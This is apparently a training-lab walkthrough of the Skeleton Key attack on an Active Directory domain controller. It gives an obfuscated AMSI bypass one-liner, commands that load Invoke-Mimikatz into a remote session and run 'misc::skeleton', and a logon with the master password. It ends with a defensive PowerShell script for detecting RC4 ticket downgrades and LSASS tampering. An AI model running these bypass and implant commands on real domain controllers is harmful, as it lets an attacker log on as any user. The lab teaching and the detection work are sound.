Obj 10 Skeleton Key
Task - Use Domain Admin privileges obtained earlier to execute the Skeleton Key attack.
Use this attack with caution! It has the potential to break the DC!
We can simply use the following mimikatz command to execute the attack. Note that the command needs to be run with Domain Admin privileges. We could also use SafetyKatz or any other tool for the attack. First we need to bypass AMSI and load mimikatz into memory on the DC:
Create a new PSSession to the DC:

```powershell
PS C:\AD\Tools\Tools> $sess = New-PSSession dcorp-dc.dollarcorp.moneycorp.local
```

Enter the session:

```powershell
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess
```

Run the AMSI bypass script:

```powershell
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

From our local machine (exit the remote session first) we can load mimikatz into memory on the DC:

```powershell
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess
```

Now we can enter back into the session and run the attack:

```powershell
PS C:\AD\Tools\Tools> Enter-PSSession -Session $sess
```

Skeleton Key attack:

```powershell
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
```
Now we can log on to any machine as any user until the DC is restarted (the patch lives only in the memory of the DC's LSASS process). The original password of each account keeps working alongside the skeleton key.

Use mimikatz as the password:

```powershell
PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Credential dcorp\administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> whoami
dcorp-dc\administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> exit
```
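From the defender's side, the same two facts that make this attack work (the KDC is patched in LSASS memory, and patched logons get RC4 tickets) are what give it away. The following script is an added example written for this page, not code from the lab or from mimikatz: it pulls RC4-HMAC (etype 0x17) TGT requests from the Security log, looks for Sysmon process-access events that wrote into lsass.exe, and reports whether LSA Protection (RunAsPPL) is enabled on the DC. It assumes it is run on the domain controller with an account that can read the Security log; the Sysmon log is optional and is skipped silently if absent. The function names and the 24-hour window are my choices.

```powershell
# Added example (defensive checks for a Skeleton Key implant on a domain controller).
# Assumptions: run on the DC as a local Administrator; Sysmon is optional.

# 1. Kerberos downgrade. The Skeleton Key patch makes the KDC issue RC4-HMAC (0x17)
#    TGTs for logons that use the master password. Where AES is the norm, RC4 TGTs
#    for users who normally get AES are the primary indicator. Event 4768 carries the
#    encryption type in the TicketEncryptionType field.
function Get-Rc4TgtRequest {
    param([int]$Hours = 24)
    $ms = $Hours * 3600 * 1000
    $xpath = "*[System[EventID=4768 and TimeCreated[timediff(@SystemTime) <= $ms]] " +
             "and EventData[Data[@Name='TicketEncryptionType']='0x17']]"
    Get-WinEvent -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time    = $_.TimeCreated
                User    = $data['TargetUserName']
                Client  = $data['IpAddress']
                EncType = $data['TicketEncryptionType']
                PreAuth = $data['PreAuthType']
                Status  = $data['Status']
            }
        }
}

# 2. LSASS tampering. Implanting the key means writing into lsass.exe. With Sysmon,
#    event 10 (ProcessAccess) on lsass.exe with PROCESS_VM_WRITE (0x20) in the
#    granted-access mask is the trace to hunt for.
function Get-LsassWriteAccess {
    param([int]$Hours = 24)
    $ms = $Hours * 3600 * 1000
    $xpath = "*[System[EventID=10 and TimeCreated[timediff(@SystemTime) <= $ms]]]"
    Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            $data
        } |
        Where-Object {
            $_['TargetImage'] -like '*\lsass.exe' -and
            ([int]$_['GrantedAccess'] -band 0x20) -ne 0   # PROCESS_VM_WRITE set
        } |
        ForEach-Object {
            [pscustomobject]@{
                Source        = $_['SourceImage']
                GrantedAccess = $_['GrantedAccess']
                CallTrace     = $_['CallTrace']
            }
        }
}

# 3. Prevention. LSA Protection (RunAsPPL) runs lsass.exe as a protected process, so
#    unsigned code cannot open it with write access and the in-memory patch fails.
function Test-LsaProtection {
    $lsa   = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $value = $lsa.RunAsPPL
    [pscustomobject]@{
        RunAsPPL = $value
        Enabled  = ($value -in 1, 2)   # 1 = enabled with UEFI lock, 2 = enabled without UEFI lock
    }
}
# To enable it (takes effect after a reboot):
#   Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Type DWord

Get-Rc4TgtRequest    | Format-Table -AutoSize
Get-LsassWriteAccess | Format-Table -AutoSize
Test-LsaProtection
```

Two caveats when reading the output. RC4 TGTs are normal for accounts that have no AES keys (for example, accounts whose msDS-SupportedEncryptionTypes was never set, or trusts configured for RC4), so establish a baseline first and alert on users who switch from AES to RC4 rather than on every 0x17 ticket. And because the implant lives only in LSASS memory, a DC reboot clears it; rebooting is the immediate remediation, but RunAsPPL is what stops the patch from being reapplied.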